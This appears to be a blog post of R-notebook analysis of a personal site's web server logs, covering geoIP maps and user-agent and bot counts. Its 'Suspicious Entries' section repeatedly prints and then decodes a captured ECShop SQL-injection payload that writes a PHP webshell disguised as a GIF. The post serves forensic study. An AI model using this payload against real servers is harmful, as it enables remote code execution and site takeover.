Traffic Journal ::001:: bcable.net HTTPD Logs

Libraries

library(ggplot2)
library(iptools)

library(gganimate)
library(transformr)

Git repositories for extra packages reference:

https://github.com/thomasp85/gganimate

https://github.com/thomasp85/transformr

Local Sourcing

Source of below includes: https://bcable.net/x/Rproj/shared

source("../../shared/load_recurse.R")
source("../../shared/load_varlog.R")
source("../../shared/parse_rawsplit.R")
source("../../shared/paths.R")

source("../../shared/cleanup_logs.R")
source("../../shared/geoip.R")
source("../../shared/country_code_cleanup.R")
source("../../shared/world_mapper.R")

Config

site_name <- "bcable.net"

GeoIP Disclaimer

Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):

Proxies, VPNs, and Tor

Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.

For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.

httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]

##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU

Vulnerable Servers and Botnets

Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and

Government Interference

It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.

Because most of these agreements are made in private, and due to the fact that most geolocation and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.

Weaknesses or errors in MaxMind or rgeolocate package

This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that there is any false geolocation is being performed by these packages, however.

Final Note

Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.

Load Files

httpd_data <- load_varlog(file.path(path_appel, "httpd"), "access_log")
httpd_data <- raw_populate(httpd_data)
httpd_data <- cleanup_httpd(httpd_data)
httpd_data$IP.Address <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[1]; })
httpd_data$Date <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[4]; })
httpd_data$Date <- as.POSIXlt(httpd_data$Date,
    format="[%d/%b/%Y:%H:%M:%S", tz=substr(httpd_data$Raw.Split[1][1], 1, 5)
)
httpd_data$Request <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[6]; })

httpd_data$Response.Code <- sapply(
    httpd_data$Raw.Split, FUN=function(x){ x[7]; }
)
httpd_data$Response.Length <- sapply(
    httpd_data$Raw.Split, FUN=function(x){ x[8]; }
)

httpd_data$HTTP.Referer <- sapply(
    httpd_data$Raw.Split, FUN=function(x){ x[9]; }
)

httpd_data$User.Agent <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[10]; })

ret <- geoip(httpd_data$IP.Address, "country_code")
httpd_data$Country.Code <- ret$country_code

Date Min: 2018-08-26 03:16:04
Date Max: 2018-10-28 07:36:07

World Hits

httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]
##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU
httpd_country_df <- country_code_cleanup(httpd_data$Country.Code)
g <- world_mapper(httpd_country_df)
g <- g + labs(
    title=paste0(site_name, ": HTTPD: Hits by Country", collapse=""),
    fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_hits

World 404s

httpd_country_df <- country_code_cleanup(
    httpd_data$Country.Code[httpd_data$Response.Code == 404]
)

g <- world_mapper(httpd_country_df)
g <- g + labs(
    title=paste0(site_name, ": HTTPD: 404 Hits by Country", collapse=""),
    fill="404 Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_404s

HTTP Referer DNS/GeoIP Lookup

referer_dns <- sub(
    "^http[s]?://([^/:]+)([/:].*)?$", "\\1",
    httpd_data$HTTP.Referer, ignore.case=TRUE
)

referer_stats <- data.frame(
    DNS.Address=names(table(referer_dns)),
    Count=as.vector(table(referer_dns))
)

referer_ip <- iptools::hostname_to_ip(unique(referer_dns))
referer_ip <- sapply(referer_ip, FUN=function(x){ x[1]; })
ret <- geoip(referer_ip, "country_code")
referer_country_code <- ret$country_code

referer_merger <- data.frame(
    IP.Address=referer_ip,
    DNS.Address=unique(referer_dns),
    Country.Code=referer_country_code
)

referer_df <- data.frame(DNS.Address=referer_dns)
referer_df <- merge(referer_df, referer_merger, by="DNS.Address")
referer_country_df <- country_code_cleanup(referer_df$Country.Code)
referer_country_df
##           Country Count
## 1          Canada     5
## 2           China    24
## 3  Czech Republic     3
## 4         Germany    10
## 5         Estonia     3
## 6          France    27
## 7           Italy     1
## 8           Japan     2
## 9     South Korea    11
## 10     Kazakhstan     3
## 11         Russia    82
## 12         Sweden     1
## 13      Singapore     3
## 14         Taiwan     2
## 15        Ukraine     9
## 16            USA  5825
g <- world_mapper(referer_country_df)
g <- g + labs(
    title=paste0(site_name, ": HTTP Referer DNS/GeoIP Lookup", collapse=""),
    fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_referer

User Agent

ua_os <- c("Media Center PC", "Android", "iPhone", "360", "Linux", "Windows NT")
ua_browser <- c("MSIE", "Edge", "OPR", "Opera", "Chrome", "Safari", "Firefox")
ua_randbrowser <- c("QQBrowser", "gemini")
ua_randsoftware <- c("CarlosMatos", "curl", "Deepnet Explorer", "Hakai", "HeadlessChrome", "ia_archiver", "Jersey", "masscan", "PxBroker", "sysscan", "w3C_Validator", "zgrab", "sysscan", "axios")
ua_none <- c("-", "null")
ua_bot <- c("AhrefsBot", "AlphaBot", "Baidu", "bingbot", "coccocbot", "DotBot", "ExtLinksBot", "Googlebot", "ICC-Crawler", "Mail.RU_Bot", "MJ12bot", "magpie-crawler", "Nimbostratus-Bot", "oBot", "redditbot", "SEMrushBot", "Gluten Free Crawler", "RankingBot2", "ResearchScan", "SemrushBot", "SeznamBot", "SiteExplorer", "Sogou", "SEOkicks", "The Knowledge AI", "Wada.vn", "YandexBot", "YisouSpider", "ZoominfoBot", "www.probethenet.com", "python-requests", "^Mozilla/[45](\\.0)?$", "robots", "Mediapartners-Google", "PHPCrawl", "Java/1.", "Go-http-client", "LMAO", "Dataprovider.com", "Yahoo! Slurp", "SurdotlyBot", "DuckDuckGo-Favicons-Bot", "ZmEu", "CCBot", "MegaIndex.ru", "nmap", "MojeekBot", "BingPreview", "Ronin", "GigablastOpenSource", "facebookexternalhit", "btcrawler", "Gogolbot", "NetcraftSurveyAgent", "Virusdie", "Shinka", "Qwantify", "Gemini", "Telesphoreo", "Grobbot", "linkdexbot", "spuhex.com", "lua-resty-http", "PocketParser", "PxBroker", "HttpUrlConnection", "Indy Library", "CATExplorador", "Validator.nu", "Go [0-9]\\.[0-9] package http", "SafeDNSBot", "spbot", "Netcraft Web Server Survey", "Faraday", "fasthttp", "archive.org_bot", "WebCapture", "WinHttp.WinHttpRequest")
browser_count <- data.frame(
    Browser=c("Bot", "Other", ua_browser),
    Count=rep(0, length(ua_browser)+2)
)

# allow for data to be removed, so you don't double count things
temp_httpd_data <- httpd_data

# deal with bots first as one big group
browser_count$Count[browser_count$Browser == "Bot"] <- length(
    grep(paste0(ua_bot, collapse="|"), temp_httpd_data$User.Agent)
)

temp_httpd_data <- temp_httpd_data[
    grep(paste0(ua_bot, collapse="|"), temp_httpd_data$User.Agent, invert=TRUE),
]

# now deal with each browser
for(browser in ua_browser){
    browser_count$Count[browser_count$Browser == browser] <-
        length(grep(browser, temp_httpd_data$User.Agent))

    temp_httpd_data <- temp_httpd_data[
        grep(browser, temp_httpd_data$User.Agent, invert=TRUE)
    ,]
}

# the rest
browser_count$Count[browser_count$Browser == "Other"] <- length(temp_httpd_data)
os_count <- data.frame(
    Browser=c(ua_browser),
    Count=rep(0, length(ua_browser)+2)
)
## Error in data.frame(Browser = c(ua_browser), Count = rep(0, length(ua_browser) + : arguments imply differing number of rows: 7, 9
browser_count
##   Browser Count
## 1     Bot 14133
## 2   Other    11
## 3    MSIE  1797
## 4    Edge    20
## 5     OPR   113
## 6   Opera    18
## 7  Chrome  7280
## 8  Safari  1723
## 9 Firefox 19932
g <- ggplot(browser_count, aes(x=Browser, y=Count))
g <- g + geom_bar(stat="identity")
g

plot of chunk graph_browsers

Suspicious Entries

This turned out to be quite a unique and complicated rabbit hole to dig down, actually.

SQL Injection Rabbit Hole

Interesting attack from China, started by looking for “union” based SQL Injection in my logs:

httpd_data[grep("union", httpd_data$HTTP.Referer),]
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             Raw
## 24015 [IPREDACTED] - - [23/Sep/2018:18:32:24 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24016  [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24672 [IPREDACTED] - - [24/Sep/2018:11:26:06 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24673  [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25609 [IPREDACTED] - - [25/Sep/2018:10:32:09 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25610  [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
##                 File.Name
## 24015 access_log-20180930
## 24016 access_log-20180930
## 24672 access_log-20180930
## 24673 access_log-20180930
## 25609 access_log-20180930
## 25610 access_log-20180930
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Raw.Split
## 24015 [IPREDACTED], -, -, [23/Sep/2018:18:32:24, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016  [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 [IPREDACTED], -, -, [24/Sep/2018:11:26:06, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673  [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 [IPREDACTED], -, -, [25/Sep/2018:10:32:09, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610  [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##            IP.Address                Date
## 24015 [IPREDACTED] 2018-09-23 18:32:24
## 24016 [IPREDACTED] 2018-09-23 18:32:25
## 24672 [IPREDACTED] 2018-09-24 11:26:06
## 24673 [IPREDACTED] 2018-09-24 11:26:07
## 25609 [IPREDACTED] 2018-09-25 10:32:09
## 25610 [IPREDACTED] 2018-09-25 10:32:10
##                                 Request Response.Code Response.Length
## 24015 GET //user.php?act=login HTTP/1.1           302             221
## 24016  GET /user.php?act=login HTTP/1.1           404             206
## 24672 GET //user.php?act=login HTTP/1.1           302             221
## 24673  GET /user.php?act=login HTTP/1.1           404             206
## 25609 GET //user.php?act=login HTTP/1.1           302             221
## 25610  GET /user.php?act=login HTTP/1.1           404             206
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   HTTP.Referer
## 24015 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24016 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24672 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24673 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25609 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25610 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
##                                                            User.Agent
## 24015 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##       Country.Code
## 24015           CN
## 24016           CN
## 24672           CN
## 24673           CN
## 25609           CN
## 25610           CN

Not really sure what they are trying to do here. There's not really much PHP on this site anymore (I've turned everything static for a reason). “user.php” doesn't exist, so I'm guessing this is an attempted attack on a specific piece of software.

Searching for “554fcae493e564ee0dc75bdf2ebf94ca”, the very unique hash came up with a few different websites that seem to have fallen victim to it. A quick MD5 crack comes up with the string “ecshop”. Searching for “ecshop” came up with the following GitHub project:

https://github.com/yezilong9/ecshop

With this “/user.php” that has a parameter check on “act=login”:

https://github.com/yezilong9/ecshop/blob/master/user.php

Dissecting this and using Google Translate to figure out some meanings:

“Mall system, support WeChat”

A WeChat based shopping system?

Member Centre
==========================================================
* Copyright 2005-2012 Shanghai Shangpai Network Technology Co., Ltd., and all rights reserved.
* Website address: http://www..com;
* ------------------------------------------------- ---------------------------
* This is not a free software! You may only modify the program code without commercial use and
* Use; no re-release of the program code for any purpose or for any purpose.

Back to the payload itself, you can see that it uses what seems to be a pickled or serialized object of some kind, then injects into the variable some things to SQL inject with. This returns from no internal table, however, instead appears to dump into specific variable outputs that are expected to pull from return row 2 and 9.

0x272f2a
0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878

Which gets reverse hexdumped into:

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ215c2hpcHMucGhwJywnR0lGODlhIDw/cGhwCiAgICAkZiA9IG5ldyBSZWZsZWN0aW9uRnVuY3Rpb24oImFzc2VydCIpOwogICAgJGYtPmludm9rZUFyZ3MoYXJyYXkoIiRfUE9TVFtfXSIpKTsKPz5zeXN0ZW0nKQ=='));//}xxx

It appears whatever in that base64_decode() call will be executed as PHP, let's find out what's in it!

file_put_contents('myships.php','GIF89a invokeArgs(array("$_POST[_]"));\n?>system')

So this injects some PHP that ends up saving a file (myships.php) that appears to look like a GIF file, but in reality, which is difficult to tell without dissecting the ecshop codebase, either executes POST variables as PHP or calls a system() call on some input. Either way, it's creating, through a very unique vector (HTTP Referer -> PHP Serialization Issue -> SQL Injection -> Obfuscated PHP Injection -> Save File), a PHP script that can do some form of remote code execution on a server.

Looking for this in the HTTPD logs again:

httpd_data[grep("myships.php", httpd_data$Request),]
##                                                                                                                                                               Raw
## 24017 [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24018  [IPREDACTED] - - [23/Sep/2018:18:32:26 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24674 [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24675  [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25611 [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25612  [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
##                 File.Name
## 24017 access_log-20180930
## 24018 access_log-20180930
## 24674 access_log-20180930
## 24675 access_log-20180930
## 25611 access_log-20180930
## 25612 access_log-20180930
##                                                                                                                                                            Raw.Split
## 24017 [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018  [IPREDACTED], -, -, [23/Sep/2018:18:32:26, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
